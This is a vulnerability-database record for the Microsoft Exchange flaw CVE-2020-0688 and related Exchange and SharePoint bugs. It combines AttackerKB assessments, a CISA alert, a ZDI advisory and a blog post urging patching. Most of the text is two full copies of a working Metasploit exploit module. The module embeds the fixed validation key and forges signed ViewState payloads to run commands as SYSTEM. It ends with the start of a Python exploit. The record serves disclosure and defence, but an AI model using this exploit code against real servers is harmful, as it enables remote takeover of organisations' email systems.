This introduces size restrictions on the OS command that can be executed.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "modified": "2020-09-18T00:00:00", "published": "2020-02-11T00:00:00", "id": "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "href": "https://attackerkb.com/topics/XbYcn2Mckk/cve-2020-0688---exchange-control-panel-viewstate-deserialization-bug", "type": "attackerkb", "title": "CVE-2020-0688 - Exchange Control Panel Viewstate Deserialization Bug", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:14:39", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-168750", "CVE-2020-17132"], "description": "A remote code execution vulnerability exists in Microsoft Exchange server due to improper validation of cmdlet arguments. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user, aka \u2018Microsoft Exchange Server Remote Code Execution Vulnerability\u2019. **Note:** As of January 12, 2021, the patch for CVE-2020-16875 has been bypassed twice. See [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132#rapid7-analysis>) for details.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at September 09, 2020 6:14pm UTC reported:\n\nThere\u2019s more info in Rapid7\u2019s analysis [here](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?#rapid7-analysis>), but as **@tsellers-r7** and **@smcintyre-r7** pointed out privately today, need for authenticated session + exposed PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February\u2019s Exchange vuln. I\u2019m interested to see how [Steven Seeley\u2019s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. 
Might be cause for quick re-evaluation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-09-11T00:00:00", "id": "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "href": "https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875", "type": "attackerkb", "title": "CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-29T00:32:41", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n\n**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). 
A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n", "modified": "2020-10-22T00:00:00", "published": "2020-10-16T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "description": "Aka \u2018Microsoft Exchange Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 12, 2021 7:07pm UTC reported:\n\nThis vulnerability is a bypass for the patch issued for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875>). The vulnerability was also identified and analyzed by Steven Seeley. 
The patch can be bypassed using call operators as described in Seeley\u2019s blog [Making Clouds Rain RCE in Office 365](<https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html>).\n\nThe original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-12-10T00:00:00", "id": "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "href": "https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132", "type": "attackerkb", "title": "CVE-2020-17132", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:06:52", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "Microsoft Exchange Servers affected by a remote code execution vulnerability, known as CVE-2020-0688, continue to be an attractive target for malicious cyber actors. A remote attacker can exploit this vulnerability to take control of an affected system that is unpatched.\n\nAlthough Microsoft disclosed the vulnerability and provided software patches for the various affected products in February 2020, advanced persistent threat actors are targeting unpatched servers, according to recent open-source reports. 
The Cybersecurity and Infrastructure Security Agency (CISA) urges users and administrators to review [Microsoft\u2019s Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) and the [National Security Agency\u2019s tweet](<https://twitter.com/NSAGov/status/1236099750610563074>) on CVE-2020-0688 for more information and apply the necessary patches as soon as possible.\n", "modified": "2020-03-10T00:00:00", "published": "2020-03-10T00:00:00", "id": "CISA:18E5825084F7681AD375ACB5B1270280", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688", "type": "cisa", "title": "Unpatched Microsoft Exchange Servers Vulnerable to CVE-2020-0688", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T07:27:55", "description": "This module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. 
With knowledge of these values, an attacker can craft a special ViewState to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Exchange Control Panel ViewState Deserialization", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_ECP_VIEWSTATE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'bindata'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n # include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Exchange Control Panel ViewState Deserialization',\n 'Description' => %q{\n This module exploits a .NET serialization vulnerability in the\n Exchange Control Panel (ECP) web page. The vulnerability is due to\n Microsoft Exchange Server not randomizing the keys on a\n per-installation basis resulting in them using the same validationKey\n and decryptionKey values. 
With knowledge of these values, an attacker\n can craft a special ViewState to cause an OS command to be executed\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\n },\n 'Author' => 'Spencer McIntyre',\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2020-0688'],\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'DefaultTarget' => 1,\n 'DisclosureDate' => '2020-02-11',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n },\n 'Privileged' => true\n ))\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),\n OptString.new('DOMAIN', [ false, 'The domain to use for authentication', '' ])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n ])\n end\n\n def check\n state = get_request_setup\n viewstate = state[:viewstate]\n return CheckCode::Unknown if viewstate.nil?\n\n viewstate = Rex::Text.decode_base64(viewstate)\n body = viewstate[0...-20]\n signature = viewstate[-20..-1]\n\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\n return CheckCode::Safe\n end\n\n # we've validated the signature matches based on the data we have and thus\n # proven that we are capable of signing a viewstate ourselves\n CheckCode::Vulnerable\n end\n\n def 
generate_viewstate(generator, session_id, cmd)\n viewstate = ::Msf::Util::DotNetDeserialization.generate(\n cmd,\n gadget_chain: :TextFormattingRunProperties,\n formatter: :LosFormatter\n )\n signature = generate_viewstate_signature(generator, session_id, viewstate)\n Rex::Text.encode_base64(viewstate + signature)\n end\n\n def generate_viewstate_signature(generator, session_id, viewstate)\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\n mac_key_bytes << Rex::Text.to_unicode(session_id)\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\n end\n\n def exploit\n state = get_request_setup\n\n # the major limit is the max length of a GET request, the command will be\n # XML escaped and then base64 encoded which both increase the size\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded, opts={state: state})\n else\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\n end\n end\n\n def execute_command(cmd, opts)\n state = opts[:state]\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\n 5.times do |iteration|\n # this request *must* be a GET request, can't use POST to use a larger viewstate\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => state[:cookies].join(''),\n 'agent' => state[:user_agent],\n 'vars_get' => {\n '__VIEWSTATE' => viewstate,\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\n }\n })\n break\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\n sleep iteration\n end\n end\n\n def get_request_setup\n # need to use a newer default user-agent than what Metasploit currently provides\n # see: 
https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\n 'method' => 'POST',\n 'agent' => user_agent,\n 'vars_post' => {\n 'password' => datastore['PASSWORD'],\n 'flags' => '4',\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa'), vhost_uri: true),\n 'username' => username\n }\n })\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\n cookies = [res.get_cookies]\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\n 'cookie' => res.get_cookies,\n 'agent' => user_agent\n })\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\n cookies << res.get_cookies\n\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\n if viewstate_generator.nil?\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\n else\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\n end\n\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\n if viewstate.nil?\n vprint_warning('Failed to find the __VIEWSTATE value')\n end\n\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\n if session_id.nil?\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\n end\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\n\n {user_agent: user_agent, cookies: cookies, viewstate: viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\n 
end\n\n def username\n if datastore['DOMAIN'].blank?\n datastore['USERNAME']\n else\n [ datastore['DOMAIN'], datastore['USERNAME'] ].join('\\\\')\n end\n end\nend\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/exchange_ecp_viewstate.rb"}], "taosecurity": [{"lastseen": "2020-04-07T15:42:39", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0688"], "description": "[](<https://1.bp.blogspot.com/-3z5xWliAyNA/XoyXtcOtaNI/AAAAAAAA_oc/Uy9Yzi4j07AtCMWr2pqem1y9kOOxa8gmQCLcBGAsYHQ/s1600/Servers%2Bvulnerable%2Bto%2BCVE-2020-0688.png>) \n--- \nCVE-2020-0688 Scan Results, per Rapid7 \n \ntl;dr -- it's the title of the post: \"If You Can't Patch Your Email Server, You Should Not Be Running It.\" \n \nI read a [disturbing story today](<https://www.bleepingcomputer.com/news/security/80-percent-of-all-exposed-exchange-servers-still-unpatched-for-critical-flaw/>) with the following news: \n \n\"Starting March 24, Rapid7 used its Project Sonar internet-wide survey tool to discover all publicly-facing Exchange servers on the Internet and the numbers are grim. \n \nAs they found, **'at least 357,629 (82.5%) of the 433,464 Exchange servers' are still vulnerable to attacks that would exploit the CVE-2020-0688 vulnerability.** \n \nTo make matters even worse,** some of the servers that were tagged by Rapid7 as being safe against attacks might still be vulnerable** given that 'the related Microsoft update wasn\u2019t always updating the build number.' \n \nFurthermore, **'there are over 31,000 Exchange 2010 servers that have not been updated since 2012**,' as the Rapid7 researchers observed. '**There are nearly 800 Exchange 2010 servers that have never been updated**.' 
\n \nThey also found **10,731 Exchange 2007 servers** and more than 166,321 Exchange 2010 ones, with the former** already running End of Support (EoS) software that hasn't received any security updates since 2017** and the latter reaching EoS in October 2020.\" \n \nIn case you were wondering, [threat actors have already been exploiting these flaws](<https://www.bleepingcomputer.com/news/security/nsa-warns-about-microsoft-exchange-flaw-as-attacks-start/>) for weeks, if not months. \n \nEmail is one of, if not the most, sensitive and important systems upon which organizations of all shapes and sizes rely. They are, by virtue of their function, inherently exposed to the Internet, meaning they are within the range of every targeted or opportunistic intruder, worldwide. \n \nIn this particular case, unpatched servers are also vulnerable to any actor who can download and update Metasploit, which is virtually 100% of them. \n \nIt is the height of negligence to run such an important system in an unpatched state, when there are much better alternatives -- namely, outsourcing your email to a competent provider, like Google, Microsoft, or several others. \n \nI expect some readers are saying \"I would never put my email in the hands of those big companies!\" That's fine, and I know several highly competent individuals who run their own email infrastructure. The problem is that they represent the small fraction of individuals and organizations who can do so. Even being extremely generous with the numbers, it appears that less than 20%, and probably less than 15% according to other estimates, can even keep their Exchange servers patched, let alone properly configured. \n \nIf you think it's still worth the risk, and your organization isn't able to patch, because you want to avoid megacorp email providers or government access to your email, you've made a critical miscalculation. 
You've essentially decided that it's more important for you to keep your email out of megacorp or government hands than it is to keep it from targeted or opportunistic intruders across the Internet. \n \nIncidentally, you've made another mistake. Those same governments you fear, at least many of them, will just leverage Metasploit to break into your janky email server anyway. \n \nThe bottom line is that unless your organization is willing to commit the resources, attention, and expertise to maintaining a properly configured and patched email system, you should outsource it. Otherwise you are being negligent with not only your organization's information, but the information of anyone with whom you exchange emails.\n\nCopyright 2003-2020 Richard Bejtlich and TaoSecurity (taosecurity.blogspot.com and www.taosecurity.com)", "modified": "2020-04-07T15:28:11", "published": "2020-04-07T15:28:00", "id": "TAOSECURITY:CF99A8E68CF7727296D8451EE445844C", "href": "https://taosecurity.blogspot.com/2020/04/if-you-cant-patch-your-email-server-you.html", "type": "taosecurity", "title": "If You Can't Patch Your Email Server, You Should Not Be Running It", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:41:06", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688"], "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is required to exploit this vulnerability. The specific flaw exists within the Exchange Control Panel web application. The product fails to generate a unique cryptographic key at installation, which can result in deserialization of untrusted data. 
An attacker can leverage this vulnerability to execute code in the context of SYSTEM.", "edition": 1, "modified": "2020-06-22T00:00:00", "published": "2020-02-20T00:00:00", "id": "ZDI-20-258", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-258/", "title": "Microsoft Exchange Server Exchange Control Panel Fixed Cryptographic Key Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2020-09-02T19:37:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "description": "**Name**| owa_rce \n---|--- \n**CVE**| CVE-2020-0688 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| owa_rce \n**Notes**| CVE Name: CVE-2020-0688 \nVENDOR: Microsoft \nNOTES: This exploit has been tested on Microsoft Exchange Server 2016 CU 15 \n \nVersionsAffected: VERSIONS \nRepeatability: Infinite \nReferences: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688 \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688 \nDate public: 2/20/2020 \nCVSS: 8.8 \n\n", "edition": 1, "modified": "2020-02-11T22:15:00", "published": "2020-02-11T22:15:00", "id": "OWA_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/owa_rce", "title": "Immunity Canvas: OWA_RCE", "type": "canvas", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2020-03-05T03:14:28", "description": "This Metasploit module exploits a .NET serialization vulnerability in the Exchange Control Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not randomizing the keys on a per-installation basis resulting in them using the same validationKey and decryptionKey values. 
With knowledge of these, values an attacker can craft a special viewstate to cause an OS command to be executed by NT_AUTHORITY\\SYSTEM using .NET deserialization.", "edition": 1, "published": "2020-03-05T00:00:00", "title": "Exchange Control Panel Viewstate Deserialization Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-05T00:00:00", "id": "1337DAY-ID-34051", "href": "https://0day.today/exploit/description/34051", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. 
With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def 
generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: 
https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n vprint_status(\"Recovered the ASP.NET_SessionID: #{session_id}\")\r\n\r\n {user_agent: user_agent, cookies: cookies, viewstate: 
viewstate, viewstate_generator: viewstate_generator, session_id: session_id}\r\n end\r\nend\n\n# 0day.today [2020-03-05] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34051"}, {"lastseen": "2020-03-04T17:20:27", "description": "Exploit for windows platform in category remote exploits", "edition": 1, "published": "2020-03-02T00:00:00", "title": "Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-02T00:00:00", "id": "1337DAY-ID-34037", "href": "https://0day.today/exploit/description/34037", "sourceData": "# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688\r\n# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: MS Exchange Server 2010 SP3 up to 2019 CU4\r\n# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019\r\n# CVE: CVE-2020-0688\r\n\r\n#! /usr/bin/env python\r\n# -*- coding: utf-8 -*- \r\n''' \r\n\r\n \r\n\tCopyright 2020 Photubias(c)\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
